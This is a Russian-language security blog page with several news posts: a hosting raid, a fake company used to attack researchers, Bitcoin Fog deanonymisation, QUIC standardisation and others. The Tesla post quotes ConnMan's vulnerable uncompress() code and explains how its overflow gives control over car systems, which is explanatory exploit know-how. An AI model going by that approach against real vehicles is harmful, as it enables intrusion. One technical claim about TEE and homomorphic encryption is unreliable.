22 сентября 2020 года служба финансовой разведки провела настоящий налёт на дата-центр Ecatel: сюда съехались два десятка машин, владельцы были задержаны по обвинению в неуплате налогов. Были конфискованы 70 000 евро наличными и десятки биткоинов, а также пять автомобилей и два электрошокера.

Некоторые комментаторы считают, что налёт фискальной полиции выглядит жестом отчаяния, как обвинения Аль Капоне в уклонении от уплаты налогов, когда никакие другие преступления не удалось доказать.

Таким образом, пуленепробиваемый голландский хостер продолжает работу. Издание NRC обращает внимание на бездействие интернет-сообщества, которое не соглашается на депиринг с Ecatel. Например, представитель Амстердамской биржи обмена сказал: Мы всего лишь канал передачи данных, мы не имеем никакого отношения к контенту. Мы ведь не можем изучать, кто из участников обмена трафиком предоставляет хостинг.

Некоторые оппоненты выступают за принятие для хостеров правил типа банковских правил KYC, чтобы собирать сведения о каждом клиенте, прежде чем предоставлять ему услуги.

Шифрование для хостинга


Возможно, некоторые вышеописанные проблемы можно решить с помощью шифрования данных на хостинге. Например, с 2020 года организация Linux Foundation продвигает среди производителей оборудования, хостеров и облачных провайдеров стандарты безопасных вычислений в изолированной среде Trusted Execution Environment (TEE), см. технический анализ Confidential Computing v1.1.

Стандарт TEE объединяет гомоморфное шифрование и TPM, не позволяя неавторизованным сторонам получить доступ к информации на сервере. При таком шифровании хостинг-провайдер вообще не видит, какие файлы у него хранятся.
Подробнее..

Хакеры создали подставную фирму SecuriElite, чтобы атаковать исследователей безопасности и других хакеров

21.04.2021 16:08:09 | Автор: admin

Сайт несуществующей компании SecuriElite

В январе 2021 года специалисты Google Threat Analysis Group (TAG) рассказали об атаке на исследователей ИТ-безопасности по всему миру. Теперь опубликованы некоторые подробности этой необычной операции.

Злоумышленники использовали новые 0-day, которые срабатывают в последних версиях Windows 10 и Chrome. Кроме того, исследователям предлагали поучаствовать в совместном проекте Visual Studio и по их запросу предоставляли DLL якобы с кодом эксплоита (хэш DLL на VirusTotal). Такой вектор социальной инженерии встречается впервые в мире.

Как показало расследование, хакерская группа контактировала с исследователями безопасности через поддельные аккаунты в социальных сетях Twitter и LinkedIn.



Фейковые профили пользователей LinkedIn и Twitter

Более того, они создали поддельную компанию под названием SecuriElite, которая базируется в Турции и якобы приглашает экспертов по безопасности. Как сообщается, компания предлагает услуги offensive security, включая пентесты, оценку безопасности программного обеспечения и эксплоиты.

В общей сложности Google идентифицировала восемь аккаунтов Twitter и семь профилей LinkedIn, которые участвовали в операции. Блог с интересной информацией на тему ИБ для привлечения целевой аудитории был запущен в 2020 году.


Блог с интересной информацией для привлечения исследователей по безопасности

Для операции были зарегистрированы профили на ряде платформ, включая Telegram, Keybase и Discord, чтобы общаться с исследователями и завоевать их доверие.

14 января 2021 года злоумышленники опубликовали в Twitter и на YouTube видео с демонстрацией эксплоита для недавно закрытой уязвимости в Windows Defender (CVE-2021-1647).



Если кто-то из исследователей по безопасности заглотил наживку, ему предлагали поучаствовать в совместном проекте Visual Studio. Это новый метод социальной инженерии, который ранее ещё не встречался.


Хакеры обещали, что в проекте Visual Studio будет код эксплоита, показанного на видео, и предоставляли DLL, которая исполнялась через Visual Studio Build Events. Сразу после этого она устанавливала соединение с удалённым командным сервером.



Сайт SecuriElite запустили 17 марта 2021 года. До этого атака велась только через блог.



Корейские коллеги уже определили уязвимость 0-day, через которую эксплоит срабатывал в Internet Explorer. О других браузерах информации пока нет.



Кроме сайта, атака велась через официальный блог blog.br0vvnn[.]io. Ранее сообщалось, что эксплоит срабатывает в последних версиях Windows 10 и Chrome со всеми патчами. Сейчас антивирусы уже начали его распознавать.

Если избранных жертв индивидуально приглашают на заражённый сайт, то это таргетированный фишинг. Если жертва сама нашла новый интересный сайт, то это немного похоже на атаку типа watering hole (когда взламывается настоящий сайт, которым пользуется целевая группа). Наверное, в данном случае можно говорить о гибридной технике.

Пока непонятно, с какой целью на компьютеры специалистов устанавливали бэкдоры. Возможно, злоумышленники искали информацию о новых 0-day. Это ценный товар на чёрном рынке. Сведения о багах в популярном ПО продаются за сотни тысяч долларов. Уязвимости эксплуатируются несколько месяцев или лет, пока о них не становится известно широкой публике. Если хакер находит серьёзную уязвимость в Windows или iOS он может обеспечить себе безбедное существование на годы вперёд и пожизненный авторитет в сообществе.

Теоретически, жертвой нацеленной атаки может стать каждый, даже эксперт по безопасности, если он не использует для выхода в интернет отдельный компьютер. Антивирусные программы здесь не помогут, скорее наоборот: зачастую они увеличивают поверхность атаки и ухудшают безопасность системы.

Google Threat Analysis Group опубликовала список аккаунтов в соцсетях, адреса командных серверов (в том числе взломанных чужих серверов, которые использовались как командные), хэши DLL для VS Project и индикаторы компрометации (IOCs).




Подробнее..

Топ-50 мировых лидеров Интернета вещей 2021 гаджеты, софт и сервисы

29.04.2021 00:23:42 | Автор: admin

Персональный компьютер Lenovo ThinkCentre M75n на процессоре AMD Ryzen 5 PRO

Журнал Computer Reseller News (CRN) ежегодно составляет рейтинг Internet of Things 50, выбирая полсотни самых крутых игроков индустрии на данный момент.

Свежий рейтинг 2021 года составлен по пяти категориям:


10 самых крутых производителей оборудования


По прогнозу Gartner, количество устройств IoT в мире вырастет до 5,8 млрд на конец текущего года. Очевидно, производителям сейчас нелегко в условиях глобального дефицита микросхем на всех рынках.

Здесь и далее рядом с названиями компаний приводятся примеры последних продуктов и технических достижений, за которые они удостоились чести попадания в рейтинг. Списки составлены в алфавитном порядке.

  • Advantech (Тайвань), специализированное оборудование: от киосков самообслуживания до систем машинного зрения для заводов
  • AMD, линейка встроенных процессоров Ryzen Embedded V2000
  • Cisco Systems (США), расширение функциональности AWS IoT Core
  • Dell Technologies
  • Hewlett Packard Enterprise
  • Intel, функция Intel Time Coordinated Computing в последних CPU, а также линейка процессоров Atom x6000E
  • Lenovo, компьютер ThinkCentre M75n IoT (на КДПВ), встроенные компьютеры ThinkEdge SE30 и SE50
  • Nvidia, система-на-кристалле Jetson Xavier NX
  • Qualcomm, модем Qualcomm 212 LTE для сетей NB-IoT
  • Supermicro, платформа Intelligent Retail Edge


10 самых крутых софтверных компаний


  • Akamai, сервис IoT Edge Connect на базе фирменной CDN
  • Amazon Web Services, ряд новых сервисов, в том числе управляемый сервис AWS IoT SiteWise для сбора и мониторинга данных с промышленного оборудования, а также AWS Snowcone и Amazon Monitron
  • Edgeworx, платформа ioFog для деплоя микросервисов на различные типы устройств в различных сетях (Kubernetes для IoT), а также видеокамера Darcy с машинным зрением и автоматической проверкой наличия масок на людях, среди прочих функций
  • EDJX, глобальная инфраструктура IoT в масштабе планеты
  • IOTech (Великобритания), опенсорсная платформа EdgeXpert
  • Kloudspot, корпоративная система наблюдения QuickStart (Situational Awareness and Intelligence Platform)
  • Microsoft, покупка стартапа CyberX (безопасность IoT), расширение функций Azure IoT, система Azure Digital Twins для цифрового моделирования объектов реального мира
  • Nubix, встроенные приложения с поддержкой контейнеров на устройствах под Linux с ОС реального времени
  • Pelion, дочерняя компания Arm, софт для управления инфраструктурой устройств IoT через контейнеры Kubernetes
  • Zededa, запуск легаси в VM рядом с новыми приложениями в контейнерах, оркестрация, опенсорсная операционная система EVE-OS


10 самых крутых компаний в области связи и подключения устройств


  • Aeris Communications, платформа Aeris Connectivity Platform
  • BehrTech (Канада), протокол дальней радиосвязи MIOTY
  • Celona, приватные мобильные сети LTE и 5G
  • Eseye, технология AnyNet+ SIM для незаметного переключения между мобильными сетями


  • Infiot, платформа Intelligent Edge как альтернатива VPN и SD-WAN
  • NetFoundry
  • Senet, провайдер LPWAN
  • Sierra Wireless, системный интегратор для развёртывания корпоративных сетей IoT
  • Verizon
  • Windstream


10 самых крутых компаний в промышленном секторе


  • FogHorn, инновационный стартап внедряет различные системы ИИ в промышленное производство
  • Hitachi Vantara, платформа Lumada IoT
  • KMC Controls, платформа KMC Commander IoT для сбора, визуализации и анализа информации с сенсоров и устройств, установки уведомлений и предупреждений
  • Litmus Automation, платформа Litmus Edge собирает данные с 250 типов устройств, последняя версия Litmus Edge 3.0 поддерживает аналитику, цифровые двойники объектов и алгоритмы машинного обучения
  • PTC, технологии IoT и дополненной реальности разрабатываются в альянсе с Rockwell Automation и Fujitsu
  • Radix IoT, управление производством на основе данных
  • Samsara
  • Schneider Electric (Франция), платформа EcoStruxure Power IoT
  • Siemens (Германия), огромное количество аппаратных и программных продуктов для IoT, таких как настенный тачскрин KNX Touch Control TC5 для управления умной квартирой (освещение, кондиционер, вентиляция, жалюзи), а также ряд промышленных систем
  • Software AG (Германия), новое приложение TrendMiner (в каталоге SAP) для промышленной аналитики на умных фабриках


10 самых крутых компаний в безопасности


  • Armis (Евгений Дибров), система Armis Asset Management для изучения всех устройств, подключённых к сети, и оценки рисков
  • Claroty
  • GlobalSign, платформа IoT Identity Platform обеспечивает защиту сетей IoT с поддержкой шифрования, аутентификации и авторизации. Работает на инфраструктуре публичных ключей с сертификатами от центра сертификации GlobalSign. Управление удостоверениями устройств на протяжении всего жизненного цикла, в том числе автоматическая подготовка, выпуск, продление и вывод из эксплуатации в конце срока службы


  • Karamba Security (Израиль), платформа XGuard Monitor
  • Medigate, защищённая аналитическая платформа для учреждения здравоохранения
  • Ockam, система безопасности с поддержкой криптографии и блокчейна
  • Ordr, мониторинг подключённых устройств, система Systems Control Engine с элементами машинного обучения
  • ReFirm Labs, платформа Binwalk проверяет уязвимости во всех прошивках всех устройств
  • Sepio Systems, защита сети от подозрительных устройств и нежелательных подключений извне
  • Vdoo (Израиль), поиск и устранение уязвимостей в устройствах IoT, проверка на соответствие стандартам безопасности.





Подробнее..

Владельца Bitcoin Fog выдал анализ блокчейна от 2011 года

10.05.2021 18:20:09 | Автор: admin


Как известно, Bitcoin не совсем анонимная система. Здесь все транзакции сохраняются и отслеживаются от начала и до конца. Поэтому для реального скрытия денег используются специальные анонимайзеры или миксеры. Они смешивают входящие транзакции на одном адресе, так что на выходе не видно, откуда пришли конкретные монеты.

Bitcoin Fog один из ведущих миксеров. Он работал десять лет. И всё-таки в конце концов предположительного админа сервиса идентифицировали и задержали.

Это история показывает, насколько сложно сохранить анонимность в онлайне. И способ деанонимизации в данном случае особенно показателен.

Предположительным админом оказался 32-летний Роман Стерлингов, гражданин России и Швеции. Что его выдало? След собственных цифровых транзакций десятилетней давности.

Романа задержали 27 апреля 2021 года в Лос-Анджелесе. Согласно судебным документам, его обвиняют его в отмывании более 1,2 миллиона биткоинов на сумму 336 миллионов долларов на момент платежей за десять лет, которые он предположительно управлял Bitcoin Fog.

Комиссия сервиса составляла 22,5%. Исходя из этой цифры и будет определяться выгода, которую якобы извлёк Стерлингов от того, что власти называют отмыванием денег. Примерно 78 миллионов транзакций сервиса исходила из сервисов даркнета по продаже запрещённых наркотиков, оружия и т. д.

Чтобы доказать злые намерения Романа, агенты Налоговой службы США в 2019 году отправили биткоины в сервис, предварительно уведомив админа, что это доходы от продажи экстази. Но транзакция в Bitcoin Fog всё равно успешно прошла. Вот такое доказательство.

В общей сложности, по подсчётам IRS, Стерлингов якобы заработал около 8 миллионов долларов. Это ещё по старому курсу биткоина.

Вычислить админа помогли криптотранзакции 2011 года, которые Стерлингов использовал для регистрации хостинга Bitcoin Fog: Это ещё один пример того, как следователи с правильными инструментами могут использовать прозрачность криптовалюты для отслеживания потока незаконных средств, говорит Джонатан Левин, соучредитель компании по анализу блокчейна Chainalysis.

В материалах уголовного дела рассказывается история, как его деанонимизировали. Началось с того, что он запустил сайт в конце 2011 года, продвигая его под псевдонимом Akemashite Omedetou (с японского С Новым годом) на биткоин-форуме BitcoinTalk.



Стерлингова выследили через тот же анализ блокчейна, от которого он защищал своих пользователей. В 2011 году он заплатил за хостинг сервера Bitcoin Fog, используя ныне несуществующую цифровую валюту Liberty Reserve. В блокчейне Bitcoin сохранилась эти транзакции по покупке Liberty Reserve: сначала он обменял евро на биткоины на известной ранее криптобирже Mt. Gox, затем перевёл эти биткоины через несколько адресов и, наконец, обменял их на другой валютной бирже на монеты Liberty Reserve, которые использовал для создания домена Bitcoin Fog.

Исходя из всей этой цепочки транзакций Налоговое управление идентифицировало аккаунт Mt. Gox, где указан домашний адрес и номер телефона Стерлингова, и даже аккаунт Google, включая русскоязычный документ на Google Диске с инструкциями, как скрывать биткоин-транзакции. В этом документе точно описывались шаги, которые Стерлингов предпринял, чтобы купить монеты Liberty Reserve.

Вот такая история деанонимизации. Bitcoin когда-то считался анонимной криптовалютой, но теперь именно блокчейн Bitcoin со всеми историческими транзакциями с момента создания системы является главным инструментом следователей. Все ваши действия десятилетней давности и сейчас как на ладони.

Интересно, что Bitcoin Fog продолжил работу по адресу http://foggedd3mc4dr2o2.onion и после задержания предположительного админа.




Подробнее..

Программные патчи для автомобилей станут обязательными и регулярными

25.05.2021 00:13:35 | Автор: admin

Автомобиль Tesla Model 3 взломали с мультикоптера (для зрелищности), источник

Автомобили Tesla по умолчанию подключаются к любой точке WiFi с идентификатором SSID Tesla Service. Это очень удобно для взлома. Пароль указан в файле .ssq, который поставляется с автомобилем, или его можно найти в интернете (см. скриншот под катом).

Таким образом, можно подключить автомобиль к своему фейковому хотспоту. Потом использовать уязвимости в программном обеспечении и получить контроль над некоторыми функциями. По сути, всё довольно просто: такие трюки показывают на каждой хакерской конференции.

Проблема в том, что критические уязвимости есть не только в теслах, а практически во всех современных автомобилях. Просто Tesla предлагает большие призы за информацию о багах, поэтому эта информация публикуется в СМИ. Остальные автомобили взламывают молча.

Взлом Tesla



Профиль в твиттере с паролем для вайфая Tesla Service

Последнюю хакерскую конференцию PWN2OWN 2020 отменили, поэтому авторы только сейчас опубликовали свой доклад по взлому Tesla. Они написали эксплоит Comsecuris, использующий две уязвимости в демоне ConnMan. Это стандартный менеджер подключений Linux. В частности, используется переполнение буфера в DNS-форвардере и утечка информации стека (stack infoleak) в компоненте DHCP.

В автомобиле Tesla 3 установлена последняя версия ConnMan 1.37, без уязвимости CVE-2017-12865, которую нашли в версии 1.34. Поэтому пришлось искать новые баги. Здесь повезло: возможность переполнения буфера обнаружилась в функции uncompress().

1 static char *uncompress(int16_t field_count, char *start, char *end,2 char *ptr, char *uncompressed, int uncomp_len,3 char **uncompressed_ptr)4 {5 char *uptr = *uncompressed_ptr; /* position in result buffer */67 debug("count %d ptr %p end %p uptr %p", field_count, ptr, end, uptr);89 while (field_count-- > 0 && ptr < end) {10 int dlen; /* data field length */11  int ulen; /* uncompress length */12  int pos; /* position in compressed string */13  char name[NS_MAXLABEL]; /* tmp label */14  uint16_t dns_type, dns_class;15  int comp_pos;1617  if (!convert_label(start, end, ptr, name, NS_MAXLABEL,18  &pos, &comp_pos))19  goto out;2021 /*22  * Copy the uncompressed resource record, type, class and \0 to23  * tmp buffer.24  */2526  ulen = strlen(name);27  strncpy(uptr, name, uncomp_len - (uptr - uncompressed));2829  debug("pos %d ulen %d left %d name %s", pos, ulen,30  (int)(uncomp_len - (uptr - uncompressed)), uptr);3132  uptr += ulen;33  *uptr++ = '\0';3435  ptr += pos;3637 /*38  * We copy also the fixed portion of the result (type, class,39  * ttl, address length and the address)40  */41  memcpy(uptr, ptr, NS_RRFIXEDSZ);4243  dns_type = uptr[0] << 8 | uptr[1];44  dns_class = uptr[2] << 8 | uptr[3];4546  if (dns_class != ns_c_in)47  goto out;4849  ptr += NS_RRFIXEDSZ;50  uptr += NS_RRFIXEDSZ;


В строках 27 и 41 функция memcpy копирует в буфер uptr содержимое памяти фиксированным размером 10 байт (NS_RRFIXEDSZ), не проверяя соответствие размера выходного буфера количеству копируемых байт.

В презентации хакеры пояснили, что контроль над демоном ConnMan даёт гораздо больше полномочий, чем другие нерутовые демоны в мультимедийной системе Tesla: он позволяет отключить файрвол, изменить таблицы маршрутизации, загрузить или выгрузить модули ядра (если они не подписаны).

В нашем случае достаточно отключить файрвол и отправить на компьютер нужные команды. Конечно, управление автомобилем через мультимедийную систему не получишь, но можно отпереть двери, изменить режим ускорения, рулевого управления и другие функции, доступные с панели компьютерного управления под Linux (раньше там стояла Ubuntu).

Обязательные апдейты безопасности


Автомобили Tesla обладают продвинутой компьютерной системой, а компания платит очень большие деньги (в районе $300 000) за сообщение о таких уязвимостей. На самом деле хакеры успешно взламывают автомобили и других производителей, просто об этом не всегда сообщают широкой публике.

Компания Upstream Security ежегодно публикует отчёт об автомобильных уязвимостях. Последний отчёт 2021 Global Automotive Cybersecurity Report содержит информацию о более 200 инцидентах безопасности с 2010 по 2020 годы.

Вот статистика по векторам атак за эти годы:



Дистанционные взломы сегодня составляют 80% атак, физическое проникновение 20%. Облачные сервисы главный вектор.

В июне 2020 года ООН приняла общий регламент безопасности для транспорта: UNECE WP.29 Cybersecurity. В 2021-2022 годы эти регуляции будут рассмотрены в нескольких странах, а в 2023-2024 годах ожидается более широкое принятие по всему миру. Первый регламент называется Cybersecurity and Cybersecurity Management Systems (CSMS). Последнюю версию см. здесь.

Документ CSMS содержит информацию об угрозах кибербезопасности и перечисляет большое количество уязвимостей и методов атаки. В приложении 5 десять страниц с описанием уязвимостей в нескольких категориях. В первой таблице кратко перечислены шесть типов угроз с различными типами уязвимостей (перечислено 29 штук) и примерами (67 штук).



В следующей таблице обобщены меры по смягчению угроз кибербезопасности внутри и за пределами автомобиля.



Основная дискуссия сейчас ведётся вокруг того, чтобы как можно оперативнее уведомлять о новых уязвимостей и быстро выпускать патчи, которые отправляются через интернет и мгновенно устанавливаются на все включённые автомобили. Но совершенно ясно, что без срочных критических обновлений в современных автомобилях никак не обойтись

Облачные сервисы, бесконтактные ключи по радиопротоколу, порт OBDII, мобильные приложения для управления автомобилем, порты USB и SD, Bluetooth, Wi-Fi, встроенный модем, сенсоры, многочисленные соединения через телематические системы и облачные сервисы, которые работают в автомобиле, встроенная мультимедийная система с компьютером в салоне. Это слишком большая поверхность атаки

Вероятно, в будущем такие удобства войдут в стандартное оснащение всех автомобилей.

P. S. Компания GlobalSign уже 25 лет выдаёт сертификаты безопасности для различных отраслей. Посмотрите нашу интерактивную страничку, посвященную 25-летнему юбилею.
Подробнее..

Транспортный протокол QUIC приняли в качестве стандарта RFC 9000

01.06.2021 02:22:59 | Автор: admin


QUIC новый транспортный протокол связи, который отличается уменьшенным временем задержки, большей надёжностью и безопасностью, чем широко используемый сегодня TCP (RFC 793).

Уже много рассказывалось о преимуществах транспорта QUIC, который взят за основу будущего стандарта HTTP/3. В HTTP следующего поколения транспорт TCP меняется на QUIC, что означает автоматическое ускорение соединений и зашифровку всего интернет-трафика, который раньше шёл в открытом виде по TCP. Нешифрованный QUIC не предусмотрен вообще.

В мае 2021 года состоялось знаменательное событие: протокол QUIC принят в качестве официального стандарта RFC9000. Это великолепные новости для всей интернет-экосистемы.

Утверждением таких стандартов занимается Инженерный совет Интернета (IETF). Ранее были оформлены вспомогательные стандарты RFC 9001, RFC 9002 и RFC 8999.

Таким образом, QUIC версии 1 теперь официально принят и утверждён. Все участвующие стороны могут завершить эксперименты с черновиками протокола и перейти на первую официальную версию.

В последние годы QUIC был одним из главных приоритетов IETF. Появившись как эксперимент Google, вскоре разработка QUIC вышла на международный уровень. Она велась почти пять лет. Зафиксировано 26 очных собраний, 1749 задач в трекере и многие тысячи писем в почтовой рассылке.

QUIC очень амбициозный проект, который принесёт большие изменения. Транспортная экосистема интернета за несколько десятилетий закостенела, а QUIC оживит её, пишут инженеры из компании Fastly, которые входят в рабочую группу по разработке протокола.

Окостенение означает, что система с каждым годом становится всё менее гибкой, менее подвижной. QUIC принесёт в транспортный уровень множество инноваций, включая обязательное шифрование, версионность, гораздо более богатый и более производительный набор сервисов, поверх которых будут строиться новые технологии. Предполагается, что QUIC приведёт к появлению нового поколения интернет-инноваций. Это уже начало происходит с расширениями, такими как ненадёжные датаграммы (Unreliable Datagram Extension). Ненадёжные датаграммы открывают двери перед новым классом медиа в реальном времени и другими приложениями, которым нужен более функциональный транспорт, чем обязательная доставка пакетов с обрывом канала при потере нескольких пикселей. Мы уже видим многообещающие технологии, такие как MASQUE и WebTransport.

HTTP/3


Стандарт HTTP/3 (это HTTP поверх QUIC) идёт с небольшим опозданием за QUIC и тоже будет официально принят в самое ближайшее время.


34-й (!) драфт HTTP/3

С момента принятия HTTP/2 прошло шесть лет: спецификация RFC 7540 опубликована в мае 2015-го, но пока не используется повсеместно. Протокол реализован во всех браузерах ещё с конца 2015 года, а спустя три года только 45,4% из 10 млн самых популярных интернет-сайтов поддерживают HTTP/2. Два с половиной года назад таких было 31,2%. Севсем недавно на HTTP/2 перешли сайты Amazon, Paypal, Telegram.org.

Cейчас практически готова третья версия HTTP/3, осталось совсем немного подождать.

QUIC представляет собой замену TCP, которая работает поверх UDP. Изначально эта технология была создана инженерами Google, как и предыдущий протокол SPDY, который стал основой HTTP/2. В первое время QUIC именовали HTTP/2-encrypted-over-UDP.

Затем разработку QUIC передали в IETF для стандартизации. Здесь он разделилcя на две части: транспорт и HTTP. Идея в том, что транспортный протокол можно использовать также для передачи других данных, а не только эксклюзивно для HTTP или HTTP-подобных протоколов. Однако название осталось таким же: QUIC. Разработкой транспортного протокола занимается рабочая группа QUIC Working Group в IETF.

Долгое время версия IETF называлась iQUIC, в то время как Google и другие продолжили работу над собственной реализацией gQUIC, но 7 ноября 2018 года один из ведущих разработчиков протокола Дмитрий Тихонов объявил, что стороны достигли совместимости протоколов, и теперь разработка продолжится в общем русле. QUIC в Chrome включается в настройках chrome://flags. Есть ещё расширение-индикатор, которое показывает, какие сайты поддерживают QUIC.



Встроенная безопасность и производительность


В чём преимущества транспортного протокола QUIC перед TCP? Преимуществ очень много. По словам руководителя рабочей группы Марка Ноттингема, переход от устаревшего TCP на новые протоколы просто неизбежен, поскольку сейчас очевидно, что TCP страдает от проблем неэффективности.

Поскольку TCP протокол доставки пакетов по порядку, то потеря одного пакета может помешать доставке приложению последующих пакетов из буфера. В мультиплексированном протоколе это может привести к большой потере производительности, объясняет Марк Ноттингем. QUIC пытается решить эту проблему с помощью эффективной перестройки семантики TCP (вместе с некоторыми аспектами потоковой модели HTTP/2) поверх UDP.

Кроме перехода значительного объёма трафика с TCP на UDP, протокол QUIC требует обязательного шифрования: нешифрованного QUIC не существует вообще. QUIC использует TLS 1.3 для установки ключей сессии, а затем шифрования каждого пакета. Но поскольку он основан на UDP, значительная часть информации о сессии и метаданных, открытых в TCP, шифруется в QUIC.



В статье Будущее интернет-протоколов Марк Ноттингем говорит о значительных улучшениях в безопасности с переходом на QUIC:

На самом деле текущий короткий заголовок iQUIC который используется для всех пакетов, кроме рукопожатия выдаёт только номер пакета, необязательный идентификатор соединения и байт состояния, необходимый для процессов вроде смены ключей шифрования и типа пакета (который тоже может быть зашифрован). Всё остальное зашифровано включая пакеты ACK, что значительно повышает планку для проведения атак с анализом трафика.

Кроме того, становится невозможна пассивная оценка RTT и потерь пакетов путём простого наблюдения за соединением; там недостаточно информации для этого.

Отсутствие наблюдаемости вызвало серьёзную озабоченность у некоторых представителей сообщества операторов связи. Они говорят, что такие пассивные измерения критически важны для отладки и анализа их сетей.

Одно из предложений для решения этой проблемы введение спин-бита. Это бит в заголовке, который меняет своё значение один раз по пути туда-обратно, так что наблюдатель может оценить RTT. Поскольку он не привязан к состоянию приложения, то не должен выдавать никакой информации о конечных точках, кроме примерной оценки местоположения сети.

Возможно, принятие стандарта QUIC произошло бы и раньше, если бы компания Google не поспешила внедрить свою реализацию в браузер Chrome, так что случилось раздвоение стандарта.

Тем не менее, прогресс неизбежен и в ближайшие годы обязательно продолжится стандартизация и повсеместное внедрение различных протоколов нового поколения, в том числе HTTP/3 на транспорте QUIC.



См. также:





Отмечайте юбилей GlobalSign и получайте скидки!


Подробнее..

На GitHub предлагают запустить каталог мобильных приложений

08.02.2021 04:16:37 | Автор: admin
В конце января компания Google ни с того ни с сего удалила из каталога Play Store приложение Element (бывший Riot) децентрализованный мессенджер, который работает на федеративной системе серверов Matrix. Кто-то из пользователей пожаловался, что в каком-то канале на каком-то сервере Matrix он увидел неприличный контент и Google просто взяла и удалила программу. Как говорят некоторые комментаторы, это аналогично запрету браузера за то, что в нём открыли неприличный сайт, или запрету почтового клиента за то, что он принял неприличное письмо. К чести Google, она признала ошибку: вице-президент лично извинился перед разработчиками Element, а приложение вернули на место.

Но мы видим, что происходит с другими. Например, Павел Дуров был вынужден удалить ряд российских телеграм-каналов под давлением Apple. Если верить Павлу, без выполнения этого требования Apple блокировала выпуск экстренного обновления Telegram для iOS.

А ведь совсем недавно все крупные интернет-компании объявили бойкот маленькому приложению Parler. Его не только изгнали со всех каталогов, но даже отказали в хостинге на Amazon!

Эти события указывают на усиление цензуры со стороны интернет-гигантов, которые контролируют платформы для распространения мобильных приложений. Напрашивается логичная мысль: а почему бы не запустить свободный каталог мобильных приложений? Например, на базе GitHub.

В нём могут спокойно публиковаться свободные мессенджеры типа Element/Matrix, Parler и Telegram, не опасаясь цензуры со стороны владельца платформы, потому что в последнее время Microsoft как будто более гуманно относится к разработчикам, чем Google и Apple. Такую идею высказал разработчик Рохан Дешмух в своём блоге, и её многие поддержали.


Децентрализация серверов и шифрование трафика тоже эффективное средство против цензуры. Сравнение функционала Matrix и Telegram

GitHub App Store


Потенциальные преимущества GitHub для хостинга мобильных приложений:

  1. Там уже лежит исходный код миллионов приложений. Интеграция APK должна быть тривиальной для реализации.
  2. В отличие от Google, GitHub действительно прислушивается к мнению пользователей.
  3. Они неплохо проявили себя в битве за youtube-dl.
  4. Здесь можно наконец-то сделать достойный каталог приложений для десктопов.
  5. Пользователи могут обсуждать вопросы непосредственно с разработчиками, а не писать комментарии на страницах приложений там очень неудобно поддерживать беседу и отслеживать решение вопросов, по сравнению с GitHub.

Идея спорная, но интересная. На GitHub можно сделать универсальный каталог для всех основных платформ, а также разрешить публикацию приложений с закрытым исходным кодом. Честно говоря, почему бы и нет? Сложно представить, кто для этой роли подходит лучше, чем GitHub.

Впрочем, далеко не факт, что Microsoft разрешит полную свободу на своём хостинге. Это такая же законопослушная американская компания, как Google и Apple.

Но GitHub пока вполне достойно показал себя после поступления запросов DMCA на удаление свободных программ. GitHub помогал разработчикам восстановить форки репозитория youtube-dl, а также успешно противостоял удалению репозиториев Popcorn Time в мае 2020 года.



Подробнее..

Категории

Последние комментарии

  • Имя: Макс
    24.08.2022 | 11:28
    Я разраб в IT компании, работаю на арбитражную команду. Мы работаем с приламы и сайтами, при работе замечаются постоянные баны и лаги. Пацаны посоветовали сервис по анализу исходного кода,https://app Подробнее..
  • Имя: 9055410337
    20.08.2022 | 17:41
    поможем пишите в телеграм Подробнее..
  • Имя: sabbat
    17.08.2022 | 20:42
    Охренеть.. это просто шикарная статья, феноменально круто. Большое спасибо за разбор! Надеюсь как-нибудь с тобой связаться для обсуждений чего-либо) Подробнее..
  • Имя: Мария
    09.08.2022 | 14:44
    Добрый день. Если обладаете такой информацией, то подскажите, пожалуйста, где можно найти много-много материала по Yggdrasil и его уязвимостях для написания диплома? Благодарю. Подробнее..
© 2006-2024, personeltest.ru